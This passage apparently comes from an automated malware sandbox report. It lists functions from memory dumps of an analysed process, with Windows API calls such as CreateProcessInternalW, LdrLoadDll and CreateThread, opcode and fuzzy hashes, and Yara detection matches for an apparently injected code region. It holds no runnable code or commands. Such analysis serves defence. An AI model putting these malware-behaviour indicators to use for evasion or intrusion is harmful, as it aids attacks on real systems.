                                                                            • Associated: 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 5803e25312753783f871642106ae3b76d2a9655e850ef99ab97e990b37012f08
                                                                            • Instruction ID: 180db98f1f9967267a980eee3dae7f60ff71dc6fd7c6986dad56fafdd8f7d7e3
                                                                            • Opcode Fuzzy Hash: 5803e25312753783f871642106ae3b76d2a9655e850ef99ab97e990b37012f08
                                                                            • Instruction Fuzzy Hash: C99002B120100903F1817559440564A0019D7D1345F91C015A4016659DDA55DA9977E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04649650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.483200241.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                            • Associated: 00000007.00000002.483914780.00000000046FB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 093abc455429ed2f58dbe540ab8508bbbc149cf56ea82142b9336dad15f384a0
                                                                            • Instruction ID: caf2e67910b9b7563b2d2583c4630135e9bebe7a16d99f8d6119f001cd2762e9
                                                                            • Opcode Fuzzy Hash: 093abc455429ed2f58dbe540ab8508bbbc149cf56ea82142b9336dad15f384a0
                                                                            • Instruction Fuzzy Hash: 129002B120504943F14175594405A460029D7D0349F51C011A4055699DA665DD95B6A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 046496E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.483200241.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                            • Associated: 00000007.00000002.483914780.00000000046FB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 260d7d41bf8a771a0309e7be06630efaded0f9c26b22aaf59ff8cd177bd93dcf
                                                                            • Instruction ID: a12e51d23f88d1d5e5994ad2562f806a051dd781dd611e1d8f96b8d4539b8699
                                                                            • Opcode Fuzzy Hash: 260d7d41bf8a771a0309e7be06630efaded0f9c26b22aaf59ff8cd177bd93dcf
                                                                            • Instruction Fuzzy Hash: 349002B120108903F1116559840574A0019D7D0345F55C411A841565DD96D5D8D17161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 046496D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.483200241.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                            • Associated: 00000007.00000002.483914780.00000000046FB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: bc3cf2d3e7afb6bda1fb32f175177da796b7be0726d271f4a3e4daf875b0b69f
                                                                            • Instruction ID: 1d456ef3a59010c2b6d15f1b7525137ea1bfb0c29defb071e7a91a216ec27b79
                                                                            • Opcode Fuzzy Hash: bc3cf2d3e7afb6bda1fb32f175177da796b7be0726d271f4a3e4daf875b0b69f
                                                                            • Instruction Fuzzy Hash: 7E9002B120100943F10165594405B460019D7E0345F51C016A4115659D9655D8917561
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04649710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.483200241.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                            • Associated: 00000007.00000002.483914780.00000000046FB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 975dfaf3ce2049f74821bcda51ef72e559159a7472164cfd9662c9fd4eec6b1c
                                                                            • Instruction ID: 56dc98f84ca73fcab2854fd405bf7692b00c15375beabc98ce7afa866c174bc6
                                                                            • Opcode Fuzzy Hash: 975dfaf3ce2049f74821bcda51ef72e559159a7472164cfd9662c9fd4eec6b1c
                                                                            • Instruction Fuzzy Hash: 6E9002B120100503F101699954096460019D7E0345F51D011A901555AED6A5D8D17171
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04649FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.483200241.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                            • Associated: 00000007.00000002.483914780.00000000046FB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 5db9fe772aaca13455620323b670b65babe4bb0dca64ff3fea21fc3da4f6dbc6
                                                                            • Instruction ID: daeb4400099d14f7c380191e2599bc8da0ecff625180755bb47a8476e0906ba7
                                                                            • Opcode Fuzzy Hash: 5db9fe772aaca13455620323b670b65babe4bb0dca64ff3fea21fc3da4f6dbc6
                                                                            • Instruction Fuzzy Hash: FD9002B131114503F111655984057060019D7D1245F51C411A481555DD96D5D8D17162
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04649780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.483200241.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                            • Associated: 00000007.00000002.483914780.00000000046FB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 13492bcab119dea077100805926a5f4cd50eee9052fc9bb1171a09638704f332
                                                                            • Instruction ID: d91dc03c6491d486ccae4bcd9c02d6ac579e4178647a9bd2f7315cf07e83e9e1
                                                                            • Opcode Fuzzy Hash: 13492bcab119dea077100805926a5f4cd50eee9052fc9bb1171a09638704f332
                                                                            • Instruction Fuzzy Hash: 079002A921300103F1817559540960A0019D7D1246F91D415A400655DCD955D8A96361
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04649860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.483200241.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                            • Associated: 00000007.00000002.483914780.00000000046FB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 9c067592516290d32116a341a9f59be4174967573d086e1fe6ab4fbd69447d4a
                                                                            • Instruction ID: 33ee846ddb0b1525da0b786db1a73792e3db8b4671f069bce6c5ef40bca40be3
                                                                            • Opcode Fuzzy Hash: 9c067592516290d32116a341a9f59be4174967573d086e1fe6ab4fbd69447d4a
                                                                            • Instruction Fuzzy Hash: 769002B120100513F11265594505707001DD7D0285F91C412A441555DDA696D992B161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04649840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.483200241.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                            • Associated: 00000007.00000002.483914780.00000000046FB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b7ad7fc0cc3517166656130499a17706c06e4952d8b42f1ff9ab5f19b4f8d2d4
                                                                            • Instruction ID: 301089024433c825ee46aa1d558d40c2b86a9098042c9d71c8e717fca164357a
                                                                            • Opcode Fuzzy Hash: b7ad7fc0cc3517166656130499a17706c06e4952d8b42f1ff9ab5f19b4f8d2d4
                                                                            • Instruction Fuzzy Hash: 939002A1242042537546B5594405507401AE7E0285B91C012A5405955C9566E896E661
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04649910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.483200241.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                            • Associated: 00000007.00000002.483914780.00000000046FB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: a6d6b8c5f459265d809a12f77a38178abd1ddc8febd638e9293d8eadbf3ba7ca
                                                                            • Instruction ID: e04a9ae76e073f71967c26d00bdeef5c4828c0c408723128754848ae8f552176
                                                                            • Opcode Fuzzy Hash: a6d6b8c5f459265d809a12f77a38178abd1ddc8febd638e9293d8eadbf3ba7ca
                                                                            • Instruction Fuzzy Hash: 519002F120100503F141755944057460019D7D0345F51C011A9055559E9699DDD576A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 046499A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.483200241.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                            • Associated: 00000007.00000002.483914780.00000000046FB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 66a12dcadf3521f0096f42c0e0fee863b1c4e7803f3e0341b80213e6bd1ec29b
                                                                            • Instruction ID: 24486741d171a67ba959bbf26b8fdb21c1002a2a042456b43b629fce3430b437
                                                                            • Opcode Fuzzy Hash: 66a12dcadf3521f0096f42c0e0fee863b1c4e7803f3e0341b80213e6bd1ec29b
                                                                            • Instruction Fuzzy Hash: 319002E134100543F10165594415B060019D7E1345F51C015E5055559D9659DC927166
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04649A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.483200241.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                            • Associated: 00000007.00000002.483914780.00000000046FB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 11c2b7e862cd181b4db13dbf52209e8b5676bd64d8dd31549ce7da0460bb34c8
                                                                            • Instruction ID: 237eea2a4491225977ff3a910fc53927bbd844d98cdb97bfdc884d6d725d7315
                                                                            • Opcode Fuzzy Hash: 11c2b7e862cd181b4db13dbf52209e8b5676bd64d8dd31549ce7da0460bb34c8
                                                                            • Instruction Fuzzy Hash: 5C9002A121180143F20169694C15B070019D7D0347F51C115A4145559CD955D8A16561
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 006284B2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70processmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00613B93), ref: 006284ED
                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00628584
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFreeHeapInternalProcess
                                                                            • String ID: .z`
                                                                            • API String ID: 1438695366-1441809116
                                                                            • Opcode ID: bedb68cb2a4f81a2d5f882d842c218954471b91a9d6171f6a7c3fdee7ccb150b
                                                                            • Instruction ID: 86738a190d8a29843b241371972953e1c21ac5e965bf4204eda1d1e7fb9dca2f
                                                                            • Opcode Fuzzy Hash: bedb68cb2a4f81a2d5f882d842c218954471b91a9d6171f6a7c3fdee7ccb150b
                                                                            • Instruction Fuzzy Hash: A31129B2210208BFDB14DF98DC80EEB37AEAF8C350F158658FA0D97241C630E911CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00626ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 00626F78
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            • Opcode ID: 765345fca11c6f3497520040ef3658d32309b93e6af466ad195617f0e54f483c
                                                                            • Instruction ID: 76712d28c2a67fcb97ccfc9a5fd058bee4d4c7d89bdafd93e0d341f7caab4052
                                                                            • Opcode Fuzzy Hash: 765345fca11c6f3497520040ef3658d32309b93e6af466ad195617f0e54f483c
                                                                            • Instruction Fuzzy Hash: D03190B5601B04ABC711DF64E9A1FA7B7BAAF88700F00841DF61A5B241D730B945CFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00626EC6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 00626F78
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            • Opcode ID: 82d1aa02b326db9acac813f69ed0fb091c5ae33f9941bf9f14833b6def920028
                                                                            • Instruction ID: 3fabb95bfe64253aa6b24967fa4a0a3c45cfca598152a28db612231a76e592a7
                                                                            • Opcode Fuzzy Hash: 82d1aa02b326db9acac813f69ed0fb091c5ae33f9941bf9f14833b6def920028
                                                                            • Instruction Fuzzy Hash: 89219EB1641714ABCB11DFA4E9A1FA7BBBAEB88700F10801DFA195B241D770A945CFE4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00628446, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00623506,?,00623C7F,00623C7F,?,00623506,?,?,?,?,?,00000000,00000000,?), ref: 006284AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID: hb
                                                                            • API String ID: 1279760036-3936974151
                                                                            • Opcode ID: 16d06c285db418bee41bf95754285ed0d1414b0374daabfcec378e9581ee6fd8
                                                                            • Instruction ID: 0524d5574d059e54caa4bbdb77241bd98065454fd5e04241c5bb5f765f89367a
                                                                            • Opcode Fuzzy Hash: 16d06c285db418bee41bf95754285ed0d1414b0374daabfcec378e9581ee6fd8
                                                                            • Instruction Fuzzy Hash: 76F08CB26042106FDB24EF98DC84EEB736DEF84390F104859FA485B341D931E904CBE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 006284C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00613B93), ref: 006284ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID: .z`
                                                                            • API String ID: 3298025750-1441809116
                                                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                            • Instruction ID: 1b0c0c800ef6341215b326be40cd9948d8c27d6be7d05497957e74c70ef888c3
                                                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                            • Instruction Fuzzy Hash: 9AE01AB12002146BDB14DF59DC45EA777ADAF88750F014558BA0857241CA30E9148AF0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00617260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 006172BA
                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 006172DB
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                            • Instruction ID: 43c167736624ec68e981a306a75b3c31a89847b14026318cbc104fe7bcb88671
                                                                            • Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                            • Instruction Fuzzy Hash: 5501A731A8062877E720A6949C03FFE776D5F41B50F550119FF04BA1C2E6A46A0646F9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00617206, Relevance: 3.0, APIs: 2, Instructions: 48threadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 006172BA
                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 006172DB
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: 32d8694d81b0374004c17c31e5c8fd8e507cb58b1f3dd0ae592b512951fa5c67
                                                                            • Instruction ID: ea523d0bf9958b096d12fd716e3e139fd41d02619be9aad59fc74f87002e4607
                                                                            • Opcode Fuzzy Hash: 32d8694d81b0374004c17c31e5c8fd8e507cb58b1f3dd0ae592b512951fa5c67
                                                                            • Instruction Fuzzy Hash: 71F02D31A806243ADB2056645C03FFF77294F51B10F19445DFE04FE1C1D5A96A4746E9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 006285C5, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00628584
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            • Opcode ID: 7eb213214c4071e09337c73d7bdf1e56776c19dd2fd0a1485d39308d9ae588f3
                                                                            • Instruction ID: a8b209660b5be02f20291947a1304c9fa4f8e0ecc09507e52c50cebe62abd65d
                                                                            • Opcode Fuzzy Hash: 7eb213214c4071e09337c73d7bdf1e56776c19dd2fd0a1485d39308d9ae588f3
                                                                            • Instruction Fuzzy Hash: 4C01DAB6200219AFDB14DF99EC81EEB77ADEF8C750F108559FA5C97241CA30F8158BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00619B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00619B82
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                            • Instruction ID: ba1c384b47e14bbf60c6b421e74e87b180cd16e766075cc0c5d901694652a8e7
                                                                            • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                            • Instruction Fuzzy Hash: D8011EB5D4020DABDF10EAE4EC52FDEB3799B54308F044199E90897241F671EB54CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0062852E, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00628584
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            • Opcode ID: 6b9c8881c9fbce652d2817e15d0c41d67e43b3058bf2911fd0b4ba349725bf45
                                                                            • Instruction ID: a140cf618aab544126a1870cd7fa28f220ed80c2c51063d24ae65a60fbeda207
                                                                            • Opcode Fuzzy Hash: 6b9c8881c9fbce652d2817e15d0c41d67e43b3058bf2911fd0b4ba349725bf45
                                                                            • Instruction Fuzzy Hash: A701FDB2204109AFCB44CF8CDC80DEB77AEAF8C310F258659FA4D97242C630E8418BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00628530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00628584
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                            • Instruction ID: ae213370d8f1e8cdd7e94ce7a1a9069d87c88fe5fd20b180dea50018cd0e0c57
                                                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                            • Instruction Fuzzy Hash: 4D01AFB2210108AFCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 006284F2, Relevance: 1.5, APIs: 1, Instructions: 37processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00628584
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            • Opcode ID: a28283032f9547995537310fb5352339906d14f8665fe6c93c7568d3df1329b5
                                                                            • Instruction ID: 4a57e8770b4ca252fa0a3ba70b788bf5f4a8d49fb945a618f6f97959a0c39132
                                                                            • Opcode Fuzzy Hash: a28283032f9547995537310fb5352339906d14f8665fe6c93c7568d3df1329b5
                                                                            • Instruction Fuzzy Hash: 24F0FEB2204515BFDB14DF98EC80EEB73ADEF8C750F118619FA1C97240C635E9118BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00627000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0061CCC0,?,?), ref: 0062703C
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: 2f517c16c91e35fbe5d50bad8f74174133b78614e2715bc381d6170f1922d42a
                                                                            • Instruction ID: c9ca20a14f9ae48a70ee71df48de01e929757f615973ba226be06342ce3d0c8b
                                                                            • Opcode Fuzzy Hash: 2f517c16c91e35fbe5d50bad8f74174133b78614e2715bc381d6170f1922d42a
                                                                            • Instruction Fuzzy Hash: 51E092733807243AE3306599AC03FE7B39DCB91B20F15002AFA4DEB6C1D595F80146E8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00626FF4, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0061CCC0,?,?), ref: 0062703C
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: eb42f9e616ef9a9aa13f0a30150cd13278fd3249dbcd5ad56ad462bc61a46f66
                                                                            • Instruction ID: 70a626ed9a21e5f732311fd637ba30ba81dcf46fd3da79b60f656d07387864c6
                                                                            • Opcode Fuzzy Hash: eb42f9e616ef9a9aa13f0a30150cd13278fd3249dbcd5ad56ad462bc61a46f66
                                                                            • Instruction Fuzzy Hash: 2EF0E5762807203BD33065649C03FD7379DCF55B10F150019FA49AB3C2D5A5B8018BE9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00628480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00623506,?,00623C7F,00623C7F,?,00623506,?,?,?,?,?,00000000,00000000,?), ref: 006284AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                            • Instruction ID: 34f7f8f10aba8042b032e07f0d5fef4457a02c0d608d1aa212f3c9441a1ab6d2
